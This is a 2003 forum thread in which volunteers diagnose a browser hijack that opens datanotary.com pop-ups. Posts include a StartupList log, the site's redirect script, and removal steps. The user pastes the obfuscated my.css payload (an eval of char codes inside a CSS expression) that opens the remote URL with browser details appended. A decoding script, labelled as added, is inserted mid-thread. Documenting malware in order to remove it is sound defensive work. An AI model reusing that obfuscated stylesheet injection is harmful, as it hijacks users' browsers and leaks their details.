datanotary - browser hijack

Discussion in 'malware problems & news' started by vertergre, Jun 10, 2003.

Thread Status:
Not open for further replies.
  1. vertergre

    vertergre Registered Member

    Joined:
    Jun 10, 2003
    Posts:
    6
    Hi.

    Hope someone can help with this. Periodically a new window will pop up when I right-click or left-click a link. The new window has the URL hxxp://datanotary.com/gallery/?r=vad&c=undefined&l=undefined&m=undefined. It's always a blank page and nothing else happens. But I think it's slowing me down a little.

    'datanotary' isn't in the registry or in any filename.

    I'm running 98SE and Smart Explorer 6.0 (a front end for the IE 5.5 engine). Smart Explorer has anti-popup built-in, and I never get a popup except this one.

    I've cleaned the cache and cookies, put datanotary.com in the Hosts file pointing to 0.0.0.0, and run Ad-Aware 6, HijackThis, Pest Patrol, SpyBot, The Cleaner, Grisoft's AVG, and have SpywareGuard, SpywareBlaster, and Script Sentry installed, and ran the Trend Micro HouseCall online scan. Nothing found it.

    Web searches have turned up nothing, except for one guy with the same problem. He said the code contained 'ClientCaps'. Maybe that's where it's getting in.

    Anybody know what this is or how to find and remove it?

    I appreciate your help.

    peace
    vertergre


    disabled link
     
  2. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,332
    Location:
    Netherlands
    Please go to http://www.tomcoyote.org/hjt/, and download 'Hijack This!'.
    Unzip, doubleclick HijackThis.exe, and hit "Scan".

    When the scan is finished, the "Scan" button will change into a "Save Log" button.
    Press that, save the log as a .txt file, and copy and paste its contents into your next post.

    Most of what it lists will be harmless, so do not fix anything yet.

    Regards,

    Pieter
     
  3. vertergre

    vertergre Registered Member

    Joined:
    Jun 10, 2003
    Posts:
    6
    Hi, Pieter.

    As I said, I've already run HijackThis, and several other virus and trojan scans, including TrendMicro's Housecall online scan. They all came up with nothing.

    But is it still helpful for you to see their logs anyway? If so, I'll post them here.

    For now, here's the log from StartUp List, at the end of this message.

    StartUp Monitor and WinPatrol haven't reported any new startups, and BHO Cop hasn't reported any new BHOs.

    Thanks very much for your generous help.

    peace
    vertergre


    StartupList report, 6/10/03, 10:21:55 pm
    StartupList version: 1.52
    Started from : E:\STARTUP LIST\STARTUPLIST.EXE
    Detected: Windows 98 SE (Win9x 4.10.2222A)
    Detected: Internet Explorer v5.51 SP2 (5.51.4807.2300)
    * Including empty and uninteresting sections
    * Showing rarely important sections
    ==================================================

    Running processes:

    C:\WINDOWS\SYSTEM\KERNEL32.DLL
    C:\WINDOWS\SYSTEM\MSGSRV32.EXE
    C:\WINDOWS\SYSTEM\MPREXE.EXE
    C:\WINDOWS\SYSTEM\mmtask.tsk
    C:\WINDOWS\EXPLORER.EXE
    C:\WINDOWS\TASKMON.EXE
    C:\WINDOWS\SYSTEM\SYSTRAY.EXE
    G:\MOUSE DRIVER\POINT32.EXE
    E:\AVG 6.0\AVGCC32.EXE
    C:\PROGRAM FILES\PESTPATROL\PPMEMCHECK.EXE
    E:\EZ MACROS 5.0\EZMACROS.EXE
    E:\WINPATROL 5.0\WINPATROL.EXE
    C:\WINDOWS\STARTUPMONITOR.EXE
    E:\MAGNIFYING GLASS 2.00\MAGNIFYING GLASS.EXE
    C:\PROGRAM FILES\STOPITNOW\STOPITNOW.EXE
    C:\WINDOWS\SYSTEM\WMIEXE.EXE
    C:\WINDOWS\SYSTEM\RNAAPP.EXE
    C:\WINDOWS\SYSTEM\TAPISRV.EXE
    C:\WINDOWS\INTEGRATOR.EXE
    E:\FREESOLITAIRE 4.0.1\FREESOLITAIRE.EXE
    E:\JBMAIL 3.1\JBMAIL.EXE
    C:\WINDOWS\NOTEPAD.EXE
    C:\WINDOWS\NOTEPAD.EXE
    C:\WINDOWS\SYSTEM\DDHELP.EXE
    E:\DRAMATIC 8.0\DRAMATIC.EXE
    C:\WINDOWS\SYSTEM\SPOOL32.EXE
    E:\SMART EXPLORER 6.0\SMARTEXPLORER.EXE
    C:\WINDOWS\NOTEPAD.EXE
    E:\STARTUP LIST\STARTUPLIST.EXE

    --------------------------------------------------

    Listing of startup folders:

    Shell folders Startup:
    [C:\WINDOWS\Start Menu\Programs\StartUp]
    BHO Cop.lnk = E:\BHO Cop 1.0\BHOCop.exe
    Hare.lnk = E:\Hare 1.5.1\Hare.exe
    SpywareGuard Control Panel.lnk = E:\SpywareGuard 1.1\spywareguardcp.exe
    stopITnow.lnk = C:\Program Files\stopItnow\stopITnow.exe

    User shell folders Startup:
    *Folder not found*

    Shell folders Common Startup:
    [C:\WINDOWS\All Users\Start Menu\Programs\StartUp]
    *No files*

    User shell folders Common Startup:
    *Folder not found*

    User shell folders Alternate Common Startup:
    *Folder not found*

    --------------------------------------------------

    Autorun entries from Registry:
    HKLM\Software\Microsoft\Windows\CurrentVersion\Run

    ScanRegistry = C:\WINDOWS\scanregw.exe /autorun
    TaskMonitor = C:\WINDOWS\taskmon.exe
    SystemTray = SysTray.Exe
    POINTER = G:\Mouse Driver\point32.exe
    AVG_CC = E:\AVG 6.0\avgcc32.exe /startup
    PPMemCheck = C:\PROGRA~1\PESTPA~1\PPMemCheck.exe
    PestPatrolCL = C:\PROGRA~1\PESTPA~1\PestPatrolCL.exe
    EZ Macros = E:\EZ Macros 5.0\EZMacros.exe /m
    WinPatrol = E:\WINPAT~1.0\WinPatrol.exe
    ScriptSentry = E:\SCRIPT SENTRY 2.7.1\SCRIPTSENTRY.exe /check
    Run StartupMonitor = StartupMonitor.exe

    --------------------------------------------------

    Autorun entries from Registry:
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

    *No values found*

    --------------------------------------------------

    Autorun entries from Registry:
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

    *No values found*

    --------------------------------------------------

    Autorun entries from Registry:
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices

    *No values found*

    --------------------------------------------------

    Autorun entries from Registry:
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

    *No values found*

    --------------------------------------------------

    Autorun entries from Registry:
    HKCU\Software\Microsoft\Windows\CurrentVersion\Run

    MagnifyingGlass = E:\MAGNIFYING GLASS 2.00\MAGNIFYING GLASS.EXE /autorun

    --------------------------------------------------

    Autorun entries from Registry:
    HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

    *No values found*

    --------------------------------------------------

    Autorun entries from Registry:
    HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

    *Registry key not found*

    --------------------------------------------------

    Autorun entries from Registry:
    HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices

    *Registry key not found*

    --------------------------------------------------

    Autorun entries from Registry:
    HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

    *Registry key not found*

    --------------------------------------------------

    Autorun entries in Registry subkeys of:
    HKLM\Software\Microsoft\Windows\CurrentVersion\Run
    *No subkeys found*

    --------------------------------------------------

    Autorun entries in Registry subkeys of:
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
    *No subkeys found*

    --------------------------------------------------

    Autorun entries in Registry subkeys of:
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
    *No subkeys found*

    --------------------------------------------------

    Autorun entries in Registry subkeys of:
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
    *No subkeys found*

    --------------------------------------------------

    Autorun entries in Registry subkeys of:
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
    *No subkeys found*

    --------------------------------------------------

    Autorun entries in Registry subkeys of:
    HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    *No subkeys found*

    --------------------------------------------------

    Autorun entries in Registry subkeys of:
    HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
    *No subkeys found*

    --------------------------------------------------

    Autorun entries in Registry subkeys of:
    HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
    *Registry key not found*

    --------------------------------------------------

    Autorun entries in Registry subkeys of:
    HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
    *Registry key not found*

    --------------------------------------------------

    Autorun entries in Registry subkeys of:
    HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
    *Registry key not found*

    --------------------------------------------------

    Autorun entries in Registry subkeys of:
    HKLM\Software\Microsoft\Windows NT\CurrentVersion\Run
    *Registry key not found*

    --------------------------------------------------

    Autorun entries in Registry subkeys of:
    HKCU\Software\Microsoft\Windows NT\CurrentVersion\Run
    *Registry key not found*

    --------------------------------------------------

    File association entry for .EXE:
    HKEY_CLASSES_ROOT\exefile\shell\open\command

    (Default) = "%1" %*

    --------------------------------------------------

    File association entry for .COM:
    HKEY_CLASSES_ROOT\comfile\shell\open\command

    (Default) = "%1" %*

    --------------------------------------------------

    File association entry for .BAT:
    HKEY_CLASSES_ROOT\batfile\shell\open\command

    (Default) = "%1" %*

    --------------------------------------------------

    File association entry for .PIF:
    HKEY_CLASSES_ROOT\piffile\shell\open\command

    (Default) = "%1" %*

    --------------------------------------------------

    File association entry for .SCR:
    HKEY_CLASSES_ROOT\scrfile\shell\open\command

    (Default) = "%1" /S

    --------------------------------------------------

    File association entry for .HTA:
    HKEY_CLASSES_ROOT\htafile\shell\open\command

    (Default) = E:\SCRIPT SENTRY 2.7.1\SCRIPTSENTRY.exe "%1" %*

    --------------------------------------------------

    Enumerating Active Setup stub paths:
    HKLM\Software\Microsoft\Active Setup\Installed Components
    (* = disabled by HKCU twin)

    [{22d6f312-b0f6-11d0-94ab-0080c74c7e95}] *
    StubPath = rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\mplay98.inf,PerUserStub

    [{89820200-ECBD-11cf-8B85-00AA005B4383}] *
    StubPath = C:\WINDOWS\SYSTEM\IE4UINIT.EXE

    [>{60B49E34-C7CC-11D0-8953-00A0C90347FF}MICROS] *
    StubPath = RunDLL32 IEDKCS32.DLL,BrandIE4 SIGNUP

    --------------------------------------------------

    Enumerating ICQ Agent Autostart apps:
    HKCU\Software\Mirabilis\ICQ\Agent\Apps

    *Registry key not found*

    --------------------------------------------------

    Load/Run keys from C:\WINDOWS\WIN.INI:

    load=
    run=

    --------------------------------------------------

    Shell & screensaver key from C:\WINDOWS\SYSTEM.INI:

    Shell=Explorer.exe
    SCRNSAVE.EXE=
    drivers=mmsystem.dll power.drv

    --------------------------------------------------

    Checking for EXPLORER.EXE instances:

    C:\WINDOWS\Explorer.exe: PRESENT!

    C:\Explorer.exe: not present
    C:\WINDOWS\Explorer\Explorer.exe: not present
    C:\WINDOWS\System\Explorer.exe: not present
    C:\WINDOWS\System32\Explorer.exe: not present
    C:\WINDOWS\Command\Explorer.exe: not present

    --------------------------------------------------

    C:\WINDOWS\WININIT.INI listing:
    (Created 10/6/2003, 21:47:6)

    [rename]
    NUL=C:\WINDOWS\TEMP\$AVGUPD$.489
    NUL=E:\AVG6~1.0\$AVGUPD$.BKP

    --------------------------------------------------

    C:\WINDOWS\WININIT.BAK listing:
    (Created 10/6/2003, 6:41:58)

    [rename]
    NUL=C:\WINDOWS\TEMP\_iu14D2N.tmp

    --------------------------------------------------

    C:\AUTOEXEC.BAT listing:

    *File is empty*

    --------------------------------------------------

    C:\CONFIG.SYS listing:

    *File is empty*

    --------------------------------------------------

    C:\WINDOWS\WINSTART.BAT listing:

    *File not found*

    --------------------------------------------------

    C:\WINDOWS\DOSSTART.BAT listing:

    LH G:\MOUSED~1\MOUSE.EXE

    --------------------------------------------------

    Checking for superhidden extensions:

    .lnk: HIDDEN! (arrow overlay: NO!)
    .pif: HIDDEN! (arrow overlay: yes)
    .exe: not hidden
    .com: not hidden
    .bat: not hidden
    .hta: not hidden
    .scr: not hidden
    .shs: HIDDEN!
    .shb: HIDDEN!
    .vbs: not hidden
    .vbe: not hidden
    .wsh: not hidden
    .scf: HIDDEN! (arrow overlay: NO!)
    .url: HIDDEN! (arrow overlay: yes)
    .js: not hidden
    .jse: not hidden

    --------------------------------------------------

    Verifying REGEDIT.EXE integrity:

    - Regedit.exe found in C:\WINDOWS
    - .reg open command is NOT normal! (E:\SCRIPT SENTRY 2.7.1\SCRIPTSENTRY.exe %1 %*)
    - Company name OK: 'Microsoft Corporation'
    - Original filename OK: 'REGEDIT.EXE'
    - File description: 'Registry Editor'

    Registry check failed!

    --------------------------------------------------

    Enumerating Browser Helper Objects:

    (no name) - E:\MASS DOWNLOADER 2.5.0.340\MDHELPER.DLL - {B930BA63-9E5A-11D3-A288-0000E80E2EDE}
    (no name) - E:\SPYBOT~1.1\SDHELPER.DLL - {53707962-6F74-2D53-2644-206D7942484F}
    (no name) - E:\ACROBAT 5.0\READER\ACTIVEX\ACROIEHELPER.OCX - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}

    --------------------------------------------------

    Enumerating Task Scheduler jobs:

    Tune-up Application Start.job

    --------------------------------------------------

    Enumerating Download Program Files:

    [DirectAnimation Java Classes]
    CODEBASE = file://C:\WINDOWS\dajava.cab
    OSD = C:\WINDOWS\Downloaded Program Files\DirectAnimation Java Classes.osd

    [Microsoft XML Parser for Java]
    CODEBASE = file://C:\WINDOWS\Java\classes\xmldso4.cab
    OSD = C:\WINDOWS\Downloaded Program Files\Microsoft XML Parser for Java.osd

    [Shockwave Flash Object]
    InProcServer32 = C:\WINDOWS\SYSTEM\MACROMED\FLASH\FLASH.OCX
    CODEBASE = http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

    [HouseCall Control]
    InProcServer32 = C:\WINDOWS\DOWNLO~1\XSCAN53.OCX
    CODEBASE = http://a840.g.akamai.net/7/840/537/2003050501/housecall.antivirus.com/housecall/xscan53.cab

    --------------------------------------------------

    Enumerating Winsock LSP files:

    NameSpace #1: C:\WINDOWS\SYSTEM\rnr20.dll
    Protocol #1: C:\WINDOWS\SYSTEM\mswsosp.dll
    Protocol #2: C:\WINDOWS\SYSTEM\msafd.dll
    Protocol #3: C:\WINDOWS\SYSTEM\msafd.dll
    Protocol #4: C:\WINDOWS\SYSTEM\msafd.dll
    Protocol #5: C:\WINDOWS\SYSTEM\rsvpsp.dll
    Protocol #6: C:\WINDOWS\SYSTEM\rsvpsp.dll

    --------------------------------------------------

    Enumerating Win9x VxD services:

    NDIS: ndis.vxd,ndis2sup.vxd
    CONFIGMG: *CONFIGMG
    NTKern: *NTKERN
    VWIN32: *VWIN32
    VFBACKUP: *VFBACKUP
    VCOMM: *VCOMM
    COMBUFF: *COMBUFF
    IFSMGR: *IFSMGR
    IOS: *IOS
    MTRR: *mtrr
    SPOOLER: *SPOOLER
    UDF: *UDF
    VFAT: *VFAT
    VCACHE: *VCACHE
    VCOND: *VCOND
    VCDFSD: *VCDFSD
    VXDLDR: *VXDLDR
    VDEF: *VDEF
    VPICD: *VPICD
    VTD: *VTD
    REBOOT: *REBOOT
    VDMAD: *VDMAD
    VSD: *VSD
    V86MMGR: *V86MMGR
    PAGESWAP: *PAGESWAP
    DOSMGR: *DOSMGR
    VMPOLL: *VMPOLL
    SHELL: *SHELL
    PARITY: *PARITY
    BIOSXLAT: *BIOSXLAT
    VMCPD: *VMCPD
    VTDAPI: *VTDAPI
    PERF: *PERF
    VRTWD: C:\WINDOWS\SYSTEM\vrtwd.386
    VFIXD: C:\WINDOWS\SYSTEM\vfixd.vxd
    VNETBIOS: vnetbios.vxd
    JAVASUP: JAVASUP.VXD

    --------------------------------------------------

    Enumerating ShellServiceObjectDelayLoad items:

    *Registry key not found*

    --------------------------------------------------
    End of report, 13,981 bytes
    Report generated in 0.114 seconds

    Command line options:
    /verbose - to add additional info on each section
    /complete - to include empty sections and unsuspicious data
    /full - to include several rarely-important sections
    /force9x - to include Win9x-only startups even if running on WinNT
    /forcent - to include WinNT-only startups even if running on Win9x
    /forceall - to include all Win9x and WinNT startups, regardless of platform
    /history - to list version history only
     
  4. Dan Perez

    Dan Perez Retired Moderator

    Joined:
    May 18, 2003
    Posts:
    1,495
    Location:
    Sunny San Diego
    When I try to access that link in a text-mode browser I get the following

    >snip<

    HTTP/1.1 200 OK
    Date: Tue, 10 Jun 2003 23:02:55 GMT
    Server: Apache/1.3.27 (Unix) PHP/4.3.1
    X-Powered-By: PHP/4.3.1
    Connection: close
    Content-Type: text/html


       <body STYLE="behavior:url(#default#clientCaps)" ID="oClientCaps" onLoad="red(oClientCaps.cookieEnabled,oClientCaps.userLanguage,oClientCaps.connectionType)">
          <script>
             function red(a,b,c)
             {
                window.top.location.href=window.top.location.href + "&c="+a+"&l="+b+"&m="+c
             }
          </script>
       </body>

    >snip<

    Now I DID notice that there had been a domain (and site!) hijack where traffic was going to a Russian server. A representative article on this can be found at

    http://www.scoop.co.nz/mason/stories/BU0008/S00168.htm

    The host I queried was 66.250.57.82 which is a colo on East Coast (US).

    I tried a look at the Smart Explorer product as I could not get any help doc without loading it. I noticed it has its own right click and double click and middle click functions though not along the lines of what you described. Have you tried updating to ver 6.1?
     
  5. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,332
    Location:
    Netherlands
    Hi vertergre,

    Could you check in the registry ( Start > Run > regedit) if there is anything suspicious present in this key:
    HKCU\Software\Microsoft\Internet Explorer\MenuExt
    There could be several sub"folders"; check these as well.

    Note: make a backup before making manual changes to the registry.

    Regards,

    Pieter
     
  6. vertergre

    vertergre Registered Member

    Joined:
    Jun 10, 2003
    Posts:
    6
    Hi, Dan.

    Thanks much for your insights. Right now it's at the point where I have to look at every single thing.

    Yes, I have Smart Explorer 6.1, but when I tried it I immediately went back to 6.0. Something was problematic, mighta been trivial, don't remember now.

    But it's been almost a year since then, trouble-free with 6.0.

    But you're saying maybe it's moderner and safer, eh?

    I've got the double-click and middle click disabled.
    And the occasional popup happens even when I type in a URL and hit Enter.

    Again, thanks. I'm still working on it. Any further thoughts, I'd appreciate.

    peace
    vertergre
     
  7. vertergre

    vertergre Registered Member

    Joined:
    Jun 10, 2003
    Posts:
    6
    Hi, Pieter.

    Thanks for the tip. I looked where you said in the registry, but there was nothing there except two subkeys for Mass Downloader, which I've used incident-free for a year.

    [It's a great downloader, by the way.]

    Thanks again. Any more thoughts, feel free.

    peace
    vertergre
     
  8. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,332
    Location:
    Netherlands
    Hi vertergre,

    This will not really lead to a solution to the mystery, but it might help:

    locate your hosts file (path should be c:\windows\hosts for Win98)
    and add the lines
    127.0.0.1 datanotary.com
    127.0.0.1 www.datanotary.com

    Keep me posted,

    Pieter
     
  9. vertergre

    vertergre Registered Member

    Joined:
    Jun 10, 2003
    Posts:
    6
    Hi, Pieter.

    Done done that one; it's in the Hosts file as
    datanotary.com
    www.datanotary.com
    http://datanotary.com
    The last one is the way it was coded, according to another infectee. The other two are overkill.

    I also put it in the Restricted Sites list.

    And both those actions might be overkill 'cause it always comes up as a blank page and stops. But safer than sorrier, since I don't know what it might be waiting to do next.

    thanks again
    vertergre
     
  10. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,332
    Location:
    Netherlands
    The page is very awkward. When I tried going there yesterday from work I got a message from the server that it was blocked due to adult content.
    So I tried from home last night and the address didn't resolve. o_O

    Let's see what your HijackThis log tells us. It does show other things than Startuplist, so it might be helpful.

    Don't you love a good mystery? :D

    Regards,

    Pieter
     
  11. TonyKlein

    TonyKlein Security Expert

    Joined:
    Feb 9, 2002
    Posts:
    4,351
    Location:
    The Netherlands
    This is from another forum thread:

    Cheers,
     
  12. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,332
    Location:
    Netherlands
    Thanks for letting us know Tony.

    I added a few "Enters" to your quote, so it didn't end up 4 screens wide. ;)

    Regards,

    Pieter
     
  13. vertergre

    vertergre Registered Member

    Joined:
    Jun 10, 2003
    Posts:
    6
    Howdy, y'all.

    I just read Pacmenred's solution at the Lavasoft Forum. His my.css file had been given some code which launched the new window. Sure enough, my file contained nearly identical code.

    Whew

    A search for 'my.css trojan' turned up a bunch of articles.

    If anyone's interested, the contents of my file are listed below.
    And if anyone can tell me what that code does, feel free.

    Thanks to you all for your generosity and helpfulness.
    Nice folk.

    peace
    vetegr



    C:\Windows\Java\my.css [line returns inserted to keep width down]

    img{behavior:url(#default#clientCaps);background-color:
    expression(eval(String.fromCharCode(40,116,104,105,115,46,
    97,108,116,61,61,34,83,85,82,70,32,73,78,32,83,84,89,76,
    69,46,46,46,32,84,72,69,32,83,69,88,32,84,82,65,67,75,69,
    82,33,34,41,32,63,32,40,32,40,119,105,110,100,111,119,46,
    111,112,101,110,40,39,104,116,116,112,58,47,47,100,97,116,
    97,110,111,116,97,114,121,46,99,111,109,47,103,97,108,108,
    101,114,121,47,63,114,61,118,97,100,38,99,61,39,43,116,
    104,105,115,46,99,111,111,107,105,101,69,110,97,98,108,
    101,100,43,39,38,108,61,39,43,116,104,105,115,46,117,115,
    101,114,76,97,110,103,117,97,103,101,43,39,38,109,61,39,
    43,116,104,105,115,46,99,111,110,110,101,99,116,105,111,
    110,84,121,112,101,44,39,39,44,39,120,61,53,48,48,48,44,
    116,111,112,61,53,48,48,48,44,121,61,53,48,48,48,44,108,
    101,102,116,61,53,48,48,48,44,104,101,105,103,104,116,61,
    54,48,48,44,119,105,100,116,104,61,56,48,48,44,100,105,
    114,101,99,116,111,114,105,101,115,61,121,101,115,44,116,
    111,111,108,98,97,114,61,121,101,115,44,115,116,97,116,
    117,115,61,121,101,115,44,32,108,111,99,97,116,105,111,
    110,61,121,101,115,44,114,101,115,105,122,97,98,108,101,
    61,121,101,115,44,109,101,110,117,98,97,114,61,121,101,
    115,44,115,99,114,111,108,108,98,97,114,115,61,121,101,
    115,39,41,41,32,63,32,116,104,105,115,46,97,108,116,61,
    34,83,85,82,70,32,73,78,32,83,84,89,76,69,46,46,32,84,72,
    69,32,83,69,88,32,84,82,65,67,75,69,82,33,34,32,58,32,39,
    39,32,41,32,58,32,39,39)))}
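
What a rule like the one in the my.css listing above hides can be read without loading it in Internet Explorer. The sketch below is an added example, not part of the original thread: it statically decodes `String.fromCharCode(...)` lists in a user stylesheet and flags the IE-only `expression()` and `behavior:url()` constructs. The function names, the sample stylesheet and the `popup.example` host are constructed for illustration.

```python
import re

# String.fromCharCode(<decimal list>); whitespace and newlines inside the
# list are tolerated because the forum post wrapped it across many lines.
FROM_CHAR_CODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)")

# IE-only constructs that let a stylesheet run script (CSS is case-insensitive).
ACTIVE_CSS = {
    "css-expression": re.compile(r"expression\s*\(", re.IGNORECASE),
    "dhtml-behavior": re.compile(r"behavior\s*:\s*url\s*\(", re.IGNORECASE),
}
URL = re.compile(r"""https?://[^\s'")]+""", re.IGNORECASE)


def decode_char_codes(css_text):
    """Return the text hidden in each String.fromCharCode(...) call.

    Purely static: the decoded script is returned as a string, never run.
    """
    decoded = []
    for match in FROM_CHAR_CODE.finditer(css_text):
        numbers = [int(n) for n in re.split(r"[\s,]+", match.group(1)) if n]
        # Drop values outside the Unicode range instead of raising.
        decoded.append("".join(chr(n) for n in numbers if n < 0x110000))
    return decoded


def inspect_stylesheet(css_text):
    """Summarise script-capable constructs found in a user stylesheet."""
    flags = sorted(name for name, rx in ACTIVE_CSS.items() if rx.search(css_text))
    scripts = decode_char_codes(css_text)
    urls = [u for script in scripts for u in URL.findall(script)]
    return {
        "flags": flags,          # which active constructs are present
        "decoded": scripts,      # recovered script text, for reading only
        "urls": urls,            # URLs the hidden script refers to
        "suspicious": bool(flags or scripts),
    }


# Constructed sample in the same shape as the posted rule (not the real payload).
SAMPLE_JS = "window.open('http://popup.example/gallery/?r=vad&c='+this.cookieEnabled)"
SAMPLE_CODES = [str(ord(ch)) for ch in SAMPLE_JS]
# Wrap the list 12 numbers per line, as the post did to keep the width down.
SAMPLE_WRAPPED = ",\n".join(
    ",".join(SAMPLE_CODES[i:i + 12]) for i in range(0, len(SAMPLE_CODES), 12)
)
SAMPLE_CSS = (
    "img{behavior:url(#default#clientCaps);background-color:\n"
    "expression(eval(String.fromCharCode(" + SAMPLE_WRAPPED + ")))}"
)
CLEAN_CSS = "body { font-family: Verdana; color: #000; }"

if __name__ == "__main__":
    for label, css in (("sample", SAMPLE_CSS), ("clean", CLEAN_CSS)):
        report = inspect_stylesheet(css)
        print(label, report["suspicious"], report["flags"], report["urls"])
        for script in report["decoded"]:
            print("  decoded:", script)
```

To check a real file, pass its contents to `inspect_stylesheet()` and read the `decoded` strings.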
     
  14. Saint

    Saint Guest

    Thanks for the info-you guys are top-notch- ;)
    Now that the problem is identified, how can I get this bad boy outta my system?
    I'm kinda new at this and I don't wanna hammer my registry...
    Help?

    Thanx
    Saint
     
  15. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,332
    Location:
    Netherlands
    Hi Saint,

    For the time being change the registry value
    [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles]
    "Use My Stylesheet"=dword:00000001

    to "Use My Stylesheet"=dword:00000000

    and rename my.css to something harmless like mycss.bak

    If you would also give us your OS, I'm sure Tony can come up with a reg file to restore everything to the default settings.

    Regards,

    Pieter
     
  16. saint

    saint Guest

    Thanks again...
    OS is Windows ME

    saint
     
  17. Saint

    Saint Guest

    Hi guys,
    In reply to your last reply...my OS is Windows ME

    Thanks
    saint
     
  18. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,332
    Location:
    Netherlands
    Hi Saint,

    Is everything working OK after the changes I proposed?
    Because it should be completely disabled this way.
    If you want to restore the default settings for that key just delete all the entries in the right hand pane of the Styles key.

    Manually create a restore point before doing so, just in case.

    Regards

    Pieter
     
  19. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,332
    Location:
    Netherlands